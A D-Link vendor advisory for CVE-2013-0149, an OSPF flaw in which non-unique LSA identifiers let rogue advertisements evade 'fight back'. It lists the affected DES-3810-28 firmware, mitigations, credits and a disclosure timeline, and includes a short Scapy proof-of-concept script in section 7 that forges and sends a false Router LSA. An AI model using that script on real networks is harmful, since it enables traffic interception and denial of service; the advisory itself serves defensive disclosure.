D-Link Systems, Inc. Information for VU#229804

Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

Status

Affected

Vendor Statement

1. Advisory Information

    Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
    D-Link ID: DLINK-2013-VUL0213
    Advisory URL: TBD prior to Aug. 1, 2013
    Date published: August 1, 2013
    Date of last update: 7/29/13 (will update on saving document)
    Reported by: CERT
    Release mode: Coordinated Release

    2. Vulnerability Information
    Class: CWE-694
    Impact: Critical
    Remotely Exploitable: Possible, but would require access via other product (s)
    Locally Exploitable: Yes
    CVE Name: CVE-2013-0149
    3. Vulnerability Description
    The Open Shortest Path First (OSPF) protocol does not specify unique Link State
    Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
    conduct a Denial of Service (DoS) attack.

    This vulnerability can allow an attacker to re-route traffic through their own router,
    compromising the confidentiality of the data, or to conduct a Denial of Service attack
    against a router, dropping all traffic.

    4. Vulnerable Packages
    The following is the list of known affected devices and the associated firmware
    (confirmed by D-Link). This will be updated as needed if additional units effected.
    1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

    5. Vendor Information, Solutions and Workarounds
    D-Link distributes a number of devices which could potentially be affected by this
    vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
    being subject to this attack.

    D-Link is working to reduce the potential impact of this vulnerability, which is a result of
    an ambiguous standard. Currently we advise the following:

    As always, adhering to best practices will be the strongest defense against attacks. As
    long as your physical devices, networks, and protocols are secured, it will be very
    difficult for an attacker to insert a rogue LSA to initiate this type of attack.

    First, this vulnerability does not defeat cryptographic (MD5) authentication, we
    recommend a strong MD5 authentication key as your best defense.
    We also recommend that administrators enable the OSPF passive interface feature to
    stop sending or receiving routing table updates on interfaces that do not participate in
    OSPF.

    Finally, we recommend that networks use MAC-based Access Control (MAC) to
    authenticate devices before they are able to communicate with the network. The MAC
    feature is a client-less design so there is no need to install extra software on a user’s
    computer, and ensures that only devices on a whitelist will have access to the network.
    When used in conjunction with common security best practices, it can help to strongly
    limit the possible vectors of attack.

    D-Link is monitoring the situation for an update to the standard that can be implemented
    to protect potentially affected devices.

    6. Credits
    Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
    Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
    Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
    Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
    The publication of this advisory was not coordinated with forementioned

    7. Technical Description / Proof of Concept Code

    7.1. OSPF “Fight Back” is triggered by LSAs with matching Router ID only, and so can
    be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
    lookup uses only the Link State ID field, and so may, depending on implementation,
    result in selecting the rogue LSA before the valid LSA.

    scappy proof of concept attack script

    attacker_source_ip = "192.168.13.1"
    attacker_router_id = "192.168.18.1"
    victim_destination_ip = "192.168.13.3"
    victim_router_id = "192.168.37.3"
    false_adv_router = "192.168.27.11"
    seq_num = 0x80000004L
    R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
    /OSPF_Hdr(src=attacker_router_id) \
    /OSPF_LSUpd(lsalist=[ \
    OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
    seq=seq_num, linklist=[ \
    OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
    OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
    OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
    ])
    ])
    send(R3_FALSE_LSA, iface="eth0")

    8. Report Timeline
    • May 28, 2013 – Notification by Cert of the issue
    • May 28, 2013 – Notify Qualified D-Link Resources of issue
    • June 6, 2013 – Cert notified embargo date changed to July 30
    • Jun 6, 2013 – D-Link Request Cert to resend details
    • June 11, 2013 – D-Link receives details
    • July 29, 2013 – Cert notified embargo date changed to Aug 1
    • July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
    • July 30, 2013 – D-Link Post Report for effected Products

    9. References
    [1] CVE-229804-2013.pdf – Owning the Routing Table Part II

    10. About D-Link
    D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
    environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
    implements and supports unified network solutions that integrate capabilities in switching, wireless,
    broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
    www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
    (www.twitter.com/dlink).

    11. Disclaimer
    D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
    subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
    Copyright 2013. D-Link. All Rights Reserved.

    References

    Authors:
    Patrick Cline - Patrick.Cline@dlink.com
    William Brown – William.Brown@dlink.com

    Vendor Information

    Please see DLINK-2013-VUL0213.

    Vendor References

    None

    Addendum

    There are no additional comments at this time.

    If you have feedback, comments, or additional information about this vulnerability, please send us email.